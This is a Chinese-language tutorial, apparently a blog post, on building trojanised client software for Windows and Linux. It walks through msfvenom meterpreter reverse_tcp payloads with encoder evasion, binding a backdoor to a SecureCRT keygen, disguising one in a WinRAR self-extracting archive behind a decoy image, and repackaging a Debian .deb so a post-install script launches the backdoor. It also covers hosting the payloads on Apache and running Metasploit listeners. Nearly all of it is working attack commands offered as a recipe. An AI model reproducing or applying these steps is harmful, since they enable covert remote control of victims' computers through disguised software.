制作windows和linux客户端恶意软件进行渗透

272 阅读3分钟

客户端渗透原理

实战——注册机捆绑恶意程序上线MSF

实战

  1. 安装开发环境

    # apt update
    # apt-get -y install cmake build-essential g++-multilib libcapstone-dev time mingw-w64-tools golang binutils-mingw-w64-x86-64 mingw-w64
    
  2. 使用msfvenom生成msf后门程序

    # msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
    // -p : payload
    // LHOST : 监听结果返回(reverse)到的主机
    // LPORT : 监听结果返回(reverse)到的主机的端口
    
  3. 绑定msf后门程序与原程序(.exe)

    # ./binding msf.exe SecureCRT-kg.exe SecureCRT-kg.ico //使用binding来绑定
    
  4. 把输出程序部署到apache上,方便下载

    # cp output/payload.exe /var/www/html
    # systemctl start apache2
    
  5. 监听msf后门程序

    # msfdb run
    # use exploit/multi/handler
    # show options
    # set payload windows/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致
    # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致
    
  6. 到靶机上排查:

    C盘该路径下会生成一个msf.exe文件 image.png

总结

  1. 原理:就是利用捆绑程序binding把一个后门程序和正常程序(.exe)捆绑在一起,生成一个捆绑程序。然后只要把该捆绑程序注入到靶机的该程序的安装目录,然后运行该捆绑程序,就会出现以下效果:

    原程序一切运行正常,但同时c盘相应目录下会生成后门程序msf.exe,并且该后门程序会自动运行。

  2. 健壮性:会被一些杀毒攻击检测到并杀死

  3. payload类型: windows/meterpreter/reverse_tcp ,reverse_tcp说明了后门程序运行时靶机 会反过来连接攻击机。

  4. 局限性:只有在局域网中攻击机才能对靶机成功控制

  5. 基于内存的: 从电脑管家给出的木马检测报告,可以看出msf后门程序是基于内存的,不写硬盘

实战——WinRAR捆绑恶意程序并自动上线MSF

实战

  1. 使用msfvenom生成msf后门程序

    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -f exe -o /var/www/html/dongman.exe
    
    
  2. 把输出程序部署到apache上,方便下载

     # cp output/payload.exe /var/www/html
     # systemctl start apache2
     
    
  3. 在windows上利用WinRAR来制作自解压捆绑软件

     1. 先找一张.jpg图片,再到网站上转换它得到一张.ico图片
     2. 利用WinRAR将.jpg图片、后门程序、.ico图片捆绑在一起:实现.ico文件是自解压捆绑软件的logo,并且一点开自解压捆绑软件就将.jpg图片打开,并且后门程序在后台运行
    
  4. 监听msf后门程序

    # msfdb run
    # use exploit/multi/handler
    # show options
    # set payload windows/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致
    # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致
    
  5. 双击运行自解压捆绑软件

实战——制作Linux恶意软件获取shell

实战

  1. 使用msfvenom生成msf后门程序

    # msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod 
    // -f elf : linux上的可执行文件格式
    
  2. 监听msf后门程序

     # msfdb run
     # use exploit/multi/handler
     # show options
     # set payload linux/x64/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致
     # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致
     
    
  3. linux靶机上运行msf后门程序

实战——制作恶意deb软件包来触发后门

实战

解包:

    # dpkg -x freesweep_1.0.1-2_amd64.deb free
  1. 使用msfvenom生成msf后门程序

    # msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources
    //注意 : 生成软件包时无论是payload还是软件包信息都需要选择能够在目标操作系统上可以执行的
    
  2. 创建软件包信息

image.png

image.png

  1. 想要使软件包安装完成后,自动执行后门文件 ---> 通过编写后脚本文件

image.png

image.png

// & :表示后台运行

  1. 打包

     # dpkg-deb --build /root/free/